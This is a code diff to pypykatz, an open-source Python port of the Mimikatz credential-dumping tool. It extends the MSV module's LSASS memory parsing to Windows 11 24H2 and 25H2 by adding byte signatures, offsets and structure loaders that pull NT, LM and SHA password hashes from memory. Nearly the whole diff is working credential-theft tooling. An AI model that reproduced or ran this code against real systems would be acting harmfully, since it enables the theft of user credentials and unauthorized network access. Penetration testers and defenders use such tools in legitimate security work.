@@ -9,6 +9,10 @@ from pypykatz.alsadecryptor.win_datatypes import BOOLEAN, HANDLE, USHORT, ULONG,
 	BYTE, PVOID, WORD, DWORD, POINTER, LUID, PSID, ANSI_STRING
 from pypykatz.alsadecryptor.package_commons import PackageTemplate
 
+
+#from pypykatz.commons.common import hexdump
+#input('CredentialManager\n' + hexdump(reader.peek(0x100)))
+
 class MsvTemplate(PackageTemplate):
 	def __init__(self):
 		super().__init__('Msv')
@@ -16,11 +20,13 @@ class MsvTemplate(PackageTemplate):
 		self.signature = None
 		self.first_entry_offset = None
 		self.offset2 = None
-		
+		self.first_entry_offset_correction = 0
+
 		self.list_entry = None
 		self.encrypted_credentials_list_struct = None
 		self.encrypted_credential_struct = None
 		self.decrypted_credential_struct = None
+
 	
 	@staticmethod
 	def get_template(sysinfo):
@@ -55,9 +61,18 @@ class MsvTemplate(PackageTemplate):
 			else:
 				template.list_entry = PKIWI_MSV1_0_LIST_62
 		
-		else:
+		elif sysinfo.buildnumber < WindowsBuild.WIN_11_24H2.value:
 			template.list_entry = PKIWI_MSV1_0_LIST_63
 		
+		elif sysinfo.buildnumber < WindowsBuild.WIN_11_25H2.value:
+			if sysinfo.msv_dll_timestamp >= 0xd133958f:
+				template.list_entry = PKIWI_MSV1_0_LIST_65
+			else:
+				template.list_entry = PKIWI_MSV1_0_LIST_64
+
+		else:
+			template.list_entry = PKIWI_MSV1_0_LIST_65
+		
 		template.log_template('list_entry', template.list_entry)
 		if sysinfo.buildnumber < WindowsBuild.WIN_10_1507.value:
 			template.decrypted_credential_struct = MSV1_0_PRIMARY_CREDENTIAL_DEC
@@ -65,8 +80,10 @@ class MsvTemplate(PackageTemplate):
 			template.decrypted_credential_struct = MSV1_0_PRIMARY_CREDENTIAL_10_OLD_DEC
 		elif sysinfo.buildnumber < WindowsBuild.WIN_10_1607.value:
 			template.decrypted_credential_struct = MSV1_0_PRIMARY_CREDENTIAL_10_DEC
-		else:
+		elif sysinfo.buildnumber < WindowsBuild.WIN_11_24H2.value:
 			template.decrypted_credential_struct = MSV1_0_PRIMARY_CREDENTIAL_10_1607_DEC
+		else:
+			template.decrypted_credential_struct = MSV1_0_PRIMARY_CREDENTIAL_11_H24_DEC
 		
 		template.log_template('decrypted_credential_struct', template.decrypted_credential_struct)			
 		if sysinfo.architecture == KatzSystemArchitecture.X64:
@@ -130,15 +147,21 @@ class MsvTemplate(PackageTemplate):
 				template.first_entry_offset = 23
 				template.offset2 = -4
 			
-			elif WindowsBuild.WIN_11_2022.value <= sysinfo.buildnumber < WindowsBuild.WIN_11_2023.value: #20348
+			elif WindowsBuild.WIN_11_2022.value <= sysinfo.buildnumber < WindowsBuild.WIN_11_2023.value:
 				template.signature = b'\x45\x89\x34\x24\x4c\x8b\xff\x8b\xf3\x45\x85\xc0\x74'
 				template.first_entry_offset = 24
 				template.offset2 = -4
 
-			else:
+			elif WindowsBuild.WIN_11_2023.value <= sysinfo.buildnumber < WindowsBuild.WIN_11_24H2.value:
 				template.signature = b'\x45\x89\x37\x4c\x8b\xf7\x8b\xf3\x45\x85\xc0\x0f'
 				template.first_entry_offset = 27
 				template.offset2 = -4
+			
+			else:
+				template.signature = b'\x45\x89\x34\x24\x8b\xfb\x45\x85\xc0\x0f'
+				template.first_entry_offset = 25
+				template.offset2 = -16
+				template.first_entry_offset_correction = 34
 		
 		elif sysinfo.architecture == KatzSystemArchitecture.X86:
 			if WindowsMinBuild.WIN_XP.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_2K3.value:
@@ -311,7 +334,7 @@ class MSV1_0_PRIMARY_CREDENTIAL_10_DEC:
 		res.LmOwfPassword = await reader.read(16)
 		res.ShaOwPassword = await reader.read(20)
 		return res 
-		
+
 class MSV1_0_PRIMARY_CREDENTIAL_10_1607_DEC:
 	def __init__(self):
 		self.LogonDomainName = None
@@ -358,8 +381,60 @@ class MSV1_0_PRIMARY_CREDENTIAL_10_1607_DEC:
 		res.NtOwfPassword = await reader.read(16)
 		res.LmOwfPassword = await reader.read(16)
 		res.ShaOwPassword = await reader.read(20)
+		return res
+	
+
+class MSV1_0_PRIMARY_CREDENTIAL_11_H24_DEC:
+	def __init__(self):
+		self.LogonDomainName = None
+		self.UserName = None
+		self.pNtlmCredIsoInProc = None
+		self.isIso = None
+		self.isNtOwfPassword = None
+		self.isLmOwfPassword = None
+		self.isShaOwPassword = None
+		self.isDPAPIProtected = None
+		self.align0 = None
+		self.align1 = None
+		self.align2 = None
+
+		
+		self.isoSize = None
+		self.DPAPIProtected = None
+
+		self.encryptedBlob = None
+		# stuff to be done! #pragma pack(pop) 
+		self.NtOwfPassword = None
+		self.LmOwfPassword = None
+		self.ShaOwPassword = None
+		
+	
+	@staticmethod
+	async def load(reader):
+		res = MSV1_0_PRIMARY_CREDENTIAL_11_H24_DEC()
+		res.LogonDomainName =  await LSA_UNICODE_STRING.load(reader)
+		res.UserName = await LSA_UNICODE_STRING.load(reader)
+		res.pNtlmCredIsoInProc = await PVOID.loadvalue(reader)
+		res.isIso = await BOOLEAN.loadvalue(reader)
+		res.isNtOwfPassword = await BOOLEAN.loadvalue(reader)
+		res.isLmOwfPassword = await BOOLEAN.loadvalue(reader)
+		res.isShaOwPassword = await BOOLEAN.loadvalue(reader)
+		res.isDPAPIProtected = await BOOLEAN.loadvalue(reader)
+		res.align0 = await BYTE.loadvalue(reader)
+		res.align1 = await BYTE.loadvalue(reader)
+		res.align2 = await BYTE.loadvalue(reader)		
+		res.isoSize = await WORD.loadvalue(reader) #// 0000
+		res.DPAPIProtected = await reader.read(20)
+		
+		if res.isIso is True:
+			res.encryptedBlob = await reader.read(res.isoSize)
+		else:
+			res.NtOwfPassword = await reader.read(16)
+			res.LmOwfPassword = await reader.read(16)
+			res.ShaOwPassword = await reader.read(20)
 		return res 
 		
+		
 class KIWI_MSV1_0_PRIMARY_CREDENTIAL_ENC:
 	def __init__(self):
 		self.Flink = None
@@ -953,7 +1028,8 @@ class PKIWI_MSV1_0_LIST_63(POINTER):
 		p.value = await reader.read_uint()
 		p.finaltype = KIWI_MSV1_0_LIST_63
 		return p
-		
+
+
 class KIWI_MSV1_0_LIST_63:
 	def __init__(self):
 		self.Flink = None
@@ -1050,9 +1126,250 @@ class KIWI_MSV1_0_LIST_63:
 		res.unk25 = await ULONG.loadvalue(reader)
 		res.unk26 = await ULONG.loadvalue(reader)
 		await reader.align()
-		#input('CredentialManager\n' + hexdump(reader.peek(0x100)))
 		res.unk27 = await PVOID.loadvalue(reader)
 		res.unk28 = await PVOID.loadvalue(reader)
 		res.unk29 = await PVOID.loadvalue(reader)
 		res.CredentialManager = await PVOID.load(reader)
-		return res
\ No newline at end of file
+		return res
+
+class PKIWI_MSV1_0_LIST_64(POINTER):
+	def __init__(self):
+		super().__init__()
+	
+	@staticmethod
+	async def load(reader):
+		p = PKIWI_MSV1_0_LIST_64()
+		p.location = reader.tell()
+		p.value = await reader.read_uint()
+		p.finaltype = KIWI_MSV1_0_LIST_64
+		return p
+	
+	
+class KIWI_MSV1_0_LIST_64:
+	def __init__(self):
+		self.Flink = None
+		self.Blink = None
+		self.unk0 = None
+		self.unk1 = None
+		self.unk2 = None
+		self.unk3 = None
+		self.unk4 = None
+		self.unk5 = None
+		self.hSemaphore6 = None
+		self.unk7 = None
+		self.hSemaphore8 = None
+		self.unk9  = None
+		self.unk10 = None
+		self.unk11 = None
+		self.unk12 = None
+		self.unk13 = None
+		self.LocallyUniqueIdentifier = None
+		self.SecondaryLocallyUniqueIdentifier = None
+		self.waza = None
+		self.unk14 = None
+		self.UserName = None
+		self.Domaine = None
+		self.unk15 = None
+		self.unk16 = None
+		self.Type = None
+		self.pSid = None
+		self.LogonType = None
+		self.unk17 = None
+		self.Session = None
+		self.LogonTime =  None
+		self.LogonServer = None
+		self.Credentials_list_ptr = None
+		self.unk18 = None
+		self.unk19 = None
+		self.unk20 = None
+		self.unk21 = None
+		self.unk22 = None
+		self.unk23 = None
+		self.unk24 = None
+		self.unk25 = None
+		self.unk26 = None
+		self.unk27 = None
+		self.unk28 = None
+		self.CredentialManager = None
+
+	@staticmethod
+	async def load(reader):
+		res = KIWI_MSV1_0_LIST_64()
+		res.Flink = await PKIWI_MSV1_0_LIST_64.load(reader)
+		res.Blink = await PKIWI_MSV1_0_LIST_64.load(reader)
+		res.unk0 = await PVOID.loadvalue(reader)
+		res.unk1 = await ULONG.loadvalue(reader)
+		await reader.align()
+		res.unk2 = await PVOID.loadvalue(reader)
+		res.unk3 = await ULONG.loadvalue(reader)
+		res.unk4 = await ULONG.loadvalue(reader)
+		res.unk5 = await ULONG.loadvalue(reader)
+		await reader.align()
+		res.hSemaphore6 = await HANDLE.loadvalue(reader)
+		res.unk7 = await PVOID.loadvalue(reader)
+		res.hSemaphore8 = await HANDLE.loadvalue(reader)
+		res.unk9 = await PVOID.loadvalue(reader)
+		res.unk10 = await PVOID.loadvalue(reader)
+		res.unk11 = await ULONG.loadvalue(reader)
+		res.unk12 = await ULONG.loadvalue(reader)
+		res.unk13 = await PVOID.loadvalue(reader)
+		await reader.align()
+		
+		res.LocallyUniqueIdentifier = await LUID.loadvalue(reader)
+		res.SecondaryLocallyUniqueIdentifier = await LUID.loadvalue(reader)
+		res.waza = await reader.read(12)
+		await reader.align()
+		res.unk14 = await PVOID.loadvalue(reader)
+
+		res.UserName = await LSA_UNICODE_STRING.load(reader)
+		res.Domaine = await LSA_UNICODE_STRING.load(reader)
+		res.unk15 = await PVOID.loadvalue(reader)
+		res.unk16 = await PVOID.loadvalue(reader)
+		res.Type = await LSA_UNICODE_STRING.load(reader)
+		res.pSid = await PSID.load(reader)
+		res.LogonType = await ULONG.loadvalue(reader)
+		await reader.align()
+		res.unk17 = await PVOID.loadvalue(reader)
+		res.Session = await ULONG.loadvalue(reader)
+		await reader.align(8)
+		t = await reader.read(8)
+		res.LogonTime =  int.from_bytes(t, byteorder = 'little', signed = False) #autoalign x86
+		res.LogonServer = await LSA_UNICODE_STRING.load(reader)
+		res.Credentials_list_ptr = await PKIWI_MSV1_0_CREDENTIAL_LIST.load(reader)
+		res.unk18 = await PVOID.loadvalue(reader)
+		res.unk19 = await PVOID.loadvalue(reader)
+		res.unk20 = await PVOID.loadvalue(reader)
+		res.unk21 = await ULONG.loadvalue(reader)
+		res.unk22 = await ULONG.loadvalue(reader)
+		res.unk23 = await ULONG.loadvalue(reader)
+		res.unk24 = await ULONG.loadvalue(reader)
+		res.unk25 = await ULONG.loadvalue(reader)
+		await reader.align()
+		res.unk26 = await PVOID.loadvalue(reader)
+		res.unk27 = await PVOID.loadvalue(reader)
+		res.unk28 = await PVOID.loadvalue(reader)
+		res.CredentialManager = await PVOID.load(reader)
+		return res
+
+
+class PKIWI_MSV1_0_LIST_65(POINTER):
+	def __init__(self):
+		super().__init__()
+	
+	@staticmethod
+	async def load(reader):
+		p = PKIWI_MSV1_0_LIST_65()
+		p.location = reader.tell()
+		p.value = await reader.read_uint()
+		p.finaltype = KIWI_MSV1_0_LIST_65
+		return p
+	
+	
+class KIWI_MSV1_0_LIST_65:
+	def __init__(self):
+		self.Flink = None
+		self.Blink = None
+		self.unk0 = None
+		self.unk1 = None
+		self.unk2 = None
+		self.unk3 = None
+		self.unk4 = None
+		self.unk5 = None
+		self.hSemaphore6 = None
+		self.unk7 = None
+		self.hSemaphore8 = None
+		self.unk9  = None
+		self.unk10 = None
+		self.unk11 = None
+		self.unk12 = None
+		self.unk13 = None
+		self.LocallyUniqueIdentifier = None
+		self.SecondaryLocallyUniqueIdentifier = None
+		self.waza = None
+		self.unk14 = None
+		self.unk15 = None
+		self.UserName = None
+		self.Domaine = None
+		self.unk16 = None
+		self.unk17 = None
+		self.Type = None
+		self.pSid = None
+		self.LogonType = None
+		self.unk18 = None
+		self.Session = None
+		self.LogonTime =  None
+		self.LogonServer = None
+		self.Credentials_list_ptr = None
+		self.unk19 = None
+		self.unk20 = None
+		self.unk21 = None
+		self.unk22 = None
+		self.unk23 = None
+		self.unk24 = None
+		self.unk25 = None
+		self.unk26 = None
+		self.unk27 = None
+		self.unk28 = None
+		self.unk29 = None
+		self.CredentialManager = None
+
+	@staticmethod
+	async def load(reader):
+		res = KIWI_MSV1_0_LIST_65()
+		res.Flink = await PKIWI_MSV1_0_LIST_65.load(reader)
+		res.Blink = await PKIWI_MSV1_0_LIST_65.load(reader)
+		res.unk0 = await PVOID.loadvalue(reader)
+		res.unk1 = await ULONG.loadvalue(reader)
+		await reader.align()
+		res.unk2 = await PVOID.loadvalue(reader)
+		res.unk3 = await ULONG.loadvalue(reader)
+		res.unk4 = await ULONG.loadvalue(reader)
+		res.unk5 = await ULONG.loadvalue(reader)
+		await reader.align()
+		res.hSemaphore6 = await HANDLE.loadvalue(reader)
+		res.unk7 = await PVOID.loadvalue(reader)
+		res.hSemaphore8 = await HANDLE.loadvalue(reader)
+		res.unk9 = await PVOID.loadvalue(reader)
+		res.unk10 = await PVOID.loadvalue(reader)
+		res.unk11 = await ULONG.loadvalue(reader)
+		res.unk12 = await ULONG.loadvalue(reader)
+		res.unk13 = await PVOID.loadvalue(reader)
+		await reader.align()
+		
+		res.LocallyUniqueIdentifier = await LUID.loadvalue(reader)
+		res.SecondaryLocallyUniqueIdentifier = await LUID.loadvalue(reader)
+		res.waza = await reader.read(12)
+		await reader.align()
+		res.unk14 = await PVOID.loadvalue(reader)
+		res.unk15 = await PVOID.loadvalue(reader) #reader.read(8)
+
+		res.UserName = await LSA_UNICODE_STRING.load(reader)
+		res.Domaine = await LSA_UNICODE_STRING.load(reader)
+		res.unk16 = await PVOID.loadvalue(reader)
+		res.unk17 = await PVOID.loadvalue(reader)
+		res.Type = await LSA_UNICODE_STRING.load(reader)
+		res.pSid = await PSID.load(reader)
+		res.LogonType = await ULONG.loadvalue(reader)
+		await reader.align()
+		res.unk18 = await PVOID.loadvalue(reader)
+		res.Session = await ULONG.loadvalue(reader)
+		await reader.align(8)
+		t = await reader.read(8)
+		res.LogonTime =  int.from_bytes(t, byteorder = 'little', signed = False) #autoalign x86
+		res.LogonServer = await LSA_UNICODE_STRING.load(reader)
+		res.Credentials_list_ptr = await PKIWI_MSV1_0_CREDENTIAL_LIST.load(reader)
+		res.unk19 = await PVOID.loadvalue(reader)
+		res.unk20 = await PVOID.loadvalue(reader)
+		res.unk21 = await PVOID.loadvalue(reader)
+		res.unk22 = await ULONG.loadvalue(reader)
+		res.unk23 = await ULONG.loadvalue(reader)
+		res.unk24 = await ULONG.loadvalue(reader)
+		res.unk25 = await ULONG.loadvalue(reader)
+		res.unk26 = await ULONG.loadvalue(reader)
+		await reader.align()
+		res.unk27 = await PVOID.loadvalue(reader)
+		res.unk28 = await PVOID.loadvalue(reader)
+		res.unk29 = await PVOID.loadvalue(reader)
+		res.CredentialManager = await PVOID.load(reader)
+		return res
+	
\ No newline at end of file
